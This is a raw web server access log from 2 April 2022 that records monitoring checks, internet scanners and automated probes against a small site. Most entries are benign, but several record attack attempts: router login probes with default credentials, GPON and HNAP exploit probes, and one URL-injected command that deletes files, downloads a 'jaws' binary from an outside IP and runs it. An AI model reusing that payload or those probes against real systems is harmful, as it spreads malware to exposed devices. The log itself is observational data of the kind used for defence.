154.209.125.48 - - [02/Apr/2022:06:15:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
139.162.145.250 - - [02/Apr/2022:06:24:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
31.210.20.60 - - [02/Apr/2022:06:38:07 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.31.8.158 - - [02/Apr/2022:06:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.161.17.249 - - [02/Apr/2022:06:46:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
64.31.8.158 - - [02/Apr/2022:06:51:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
103.41.36.80 - - [02/Apr/2022:06:51:59 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
167.248.133.47 - - [02/Apr/2022:06:52:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.47 - - [02/Apr/2022:06:52:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.47 - - [02/Apr/2022:06:52:35 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:54:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
183.89.177.229 - - [02/Apr/2022:06:55:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
64.31.8.158 - - [02/Apr/2022:06:55:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "GET /text4041648875354 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:55:54 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
71.84.222.62 - - [02/Apr/2022:06:55:57 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:56:04 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:56:05 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.142.201 - - [02/Apr/2022:06:56:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.253.142.201 - - [02/Apr/2022:06:56:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.253.142.201 - - [02/Apr/2022:06:56:06 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
39.98.121.27 - - [02/Apr/2022:06:57:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.138.57 - - [02/Apr/2022:06:57:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:46 +0200] "GET /text4041648875525 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.218.13.226 - - [02/Apr/2022:06:58:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:46 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
8.218.13.226 - - [02/Apr/2022:06:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:47 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.218.13.226 - - [02/Apr/2022:06:58:48 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
8.218.13.226 - - [02/Apr/2022:06:58:57 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:57 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.218.13.226 - - [02/Apr/2022:06:58:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.218.13.226 - - [02/Apr/2022:06:58:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
8.218.13.226 - - [02/Apr/2022:06:58:59 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
47.253.138.57 - - [02/Apr/2022:06:59:06 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.253.138.57 - - [02/Apr/2022:06:59:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.138.57 - - [02/Apr/2022:06:59:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.253.138.57 - - [02/Apr/2022:06:59:07 +0200] "GET /text4041648875546 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.253.138.57 - - [02/Apr/2022:06:59:07 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.253.138.57 - - [02/Apr/2022:06:59:07 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
39.98.121.27 - - [02/Apr/2022:06:59:08 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
39.98.121.27 - - [02/Apr/2022:06:59:13 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.98.121.27 - - [02/Apr/2022:06:59:13 +0200] "GET /text4041648875547 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
39.98.121.27 - - [02/Apr/2022:06:59:13 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.98.121.27 - - [02/Apr/2022:06:59:13 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
39.98.121.27 - - [02/Apr/2022:06:59:14 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.253.138.57 - - [02/Apr/2022:06:59:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.138.57 - - [02/Apr/2022:06:59:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.98.121.27 - - [02/Apr/2022:06:59:18 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.98.121.27 - - [02/Apr/2022:06:59:19 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.138.57 - - [02/Apr/2022:06:59:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.253.138.57 - - [02/Apr/2022:06:59:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.253.138.57 - - [02/Apr/2022:06:59:23 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
39.98.121.27 - - [02/Apr/2022:06:59:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
39.98.121.27 - - [02/Apr/2022:06:59:31 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
39.98.121.27 - - [02/Apr/2022:06:59:33 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
31.210.20.60 - - [02/Apr/2022:07:00:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Apr/2022:07:00:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
39.103.180.77 - - [02/Apr/2022:07:01:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:04 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
39.103.180.77 - - [02/Apr/2022:07:01:04 +0200] "GET /text4041648875664 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
39.103.180.77 - - [02/Apr/2022:07:01:05 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
39.103.180.77 - - [02/Apr/2022:07:01:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:06 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
39.103.180.77 - - [02/Apr/2022:07:01:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:14 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:15 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:16 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:16 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.180.77 - - [02/Apr/2022:07:01:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
39.103.180.77 - - [02/Apr/2022:07:01:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
212.91.246.72 - - [02/Apr/2022:07:01:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.142.8.115 - - [02/Apr/2022:07:01:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:43 +0200] "GET /text4041648875703 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
8.142.8.115 - - [02/Apr/2022:07:01:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:44 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
8.142.8.115 - - [02/Apr/2022:07:01:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:44 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
8.142.8.115 - - [02/Apr/2022:07:01:44 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
39.103.180.77 - - [02/Apr/2022:07:01:49 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
8.142.8.115 - - [02/Apr/2022:07:01:54 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:54 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:54 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:01:54 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
8.142.8.115 - - [02/Apr/2022:07:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
8.142.8.115 - - [02/Apr/2022:07:02:01 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
8.142.8.115 - - [02/Apr/2022:07:02:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [02/Apr/2022:07:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.202.9.244 - - [02/Apr/2022:07:02:30 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [02/Apr/2022:07:03:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:03:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
47.253.151.157 - - [02/Apr/2022:07:03:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Apr/2022:07:04:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.253.151.157 - - [02/Apr/2022:07:05:21 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.253.151.157 - - [02/Apr/2022:07:05:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.151.157 - - [02/Apr/2022:07:05:21 +0200] "GET /text4041648875921 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.253.151.157 - - [02/Apr/2022:07:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.253.151.157 - - [02/Apr/2022:07:05:22 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.253.151.157 - - [02/Apr/2022:07:05:22 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
212.91.246.72 - - [02/Apr/2022:07:05:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.253.151.157 - - [02/Apr/2022:07:05:31 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.151.157 - - [02/Apr/2022:07:05:31 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.151.157 - - [02/Apr/2022:07:05:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.253.151.157 - - [02/Apr/2022:07:05:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.253.151.157 - - [02/Apr/2022:07:05:40 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [02/Apr/2022:07:06:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:06:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
47.253.212.247 - - [02/Apr/2022:07:06:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "GET /text4041648876011 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.253.212.247 - - [02/Apr/2022:07:06:51 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.253.212.247 - - [02/Apr/2022:07:07:01 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.212.247 - - [02/Apr/2022:07:07:01 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.253.212.247 - - [02/Apr/2022:07:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.253.212.247 - - [02/Apr/2022:07:07:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.253.212.247 - - [02/Apr/2022:07:07:02 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [02/Apr/2022:07:07:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.7 - - [02/Apr/2022:07:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
47.243.5.169 - - [02/Apr/2022:07:08:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Apr/2022:07:08:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:09:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.243.5.169 - - [02/Apr/2022:07:10:10 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
47.243.5.169 - - [02/Apr/2022:07:10:10 +0200] "GET /text4041648876209 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
47.243.5.169 - - [02/Apr/2022:07:10:11 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
47.243.5.169 - - [02/Apr/2022:07:10:11 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
47.243.5.169 - - [02/Apr/2022:07:10:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.243.5.169 - - [02/Apr/2022:07:10:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.243.5.169 - - [02/Apr/2022:07:10:20 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.5.169 - - [02/Apr/2022:07:10:21 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.243.5.169 - - [02/Apr/2022:07:10:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
47.243.5.169 - - [02/Apr/2022:07:10:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.243.5.169 - - [02/Apr/2022:07:10:24 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [02/Apr/2022:07:10:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Apr/2022:07:12:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:12:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
141.213.13.200 - - [02/Apr/2022:07:12:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Apr/2022:07:13:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:14:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.140.188.22 - - [02/Apr/2022:07:14:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [02/Apr/2022:07:15:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:16:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:17:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:18:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:19:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.202.169.132 - - [02/Apr/2022:07:19:53 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
31.210.20.60 - - [02/Apr/2022:07:20:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Apr/2022:07:20:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:21:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:22:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:23:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:24:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:25:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:26:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:27:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:28:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:29:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Apr/2022:07:29:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:30:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.202.169.132 - - [02/Apr/2022:07:31:18 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Apr/2022:07:31:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:32:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:34:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
160.178.103.39 - - [02/Apr/2022:07:35:25 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [02/Apr/2022:07:35:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.96.130.16 - - [02/Apr/2022:07:35:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.31.8.158 - - [02/Apr/2022:07:35:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Apr/2022:07:36:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:37:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:38:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.8.158 - - [02/Apr/2022:07:38:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Apr/2022:07:39:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:40:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:41:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:42:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:43:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:44:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:45:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:46:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
